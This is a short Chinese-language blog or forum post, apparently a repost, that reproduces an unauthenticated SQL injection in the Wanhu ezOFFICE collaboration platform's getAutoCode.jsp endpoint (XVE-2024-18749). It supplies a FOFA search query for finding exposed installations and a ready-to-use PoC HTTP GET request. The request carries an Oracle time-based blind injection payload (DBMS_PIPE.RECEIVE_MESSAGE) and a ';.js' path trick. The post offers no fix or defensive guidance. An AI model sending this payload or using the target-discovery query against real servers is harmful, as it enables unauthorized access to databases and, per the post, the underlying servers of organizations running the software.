万户 ezOFFICE协同管理平台 getAutoCode SQL注入漏洞复现(XVE-2024-18749)
0x01 产品简介万户OA ezoffice是万户网络协同办公产品多年来不停将重要精力致力于中高端市场的一款OA协同办公软件产品,同一的基础管理平台,实现用户数据同一管理、权限同一分配、身份同一认证。同一规划流派网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效进步工作效率。
0x02 漏洞概述
万户 ezOFFICE getAutoCode.jsp接口处存在SQL注入漏洞,未经身份验证的远程攻击者可使用此漏洞获取数据库权限,深入使用可获取服务器权限。
0x03 复现情况
FOFA:app="万户网络-ezOFFICE"
https://i-blog.csdnimg.cn/direct/ca6a51ef565f4a0ba168167705e36589.png
0x04 漏洞复现
PoC
GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C8%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
Host:
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]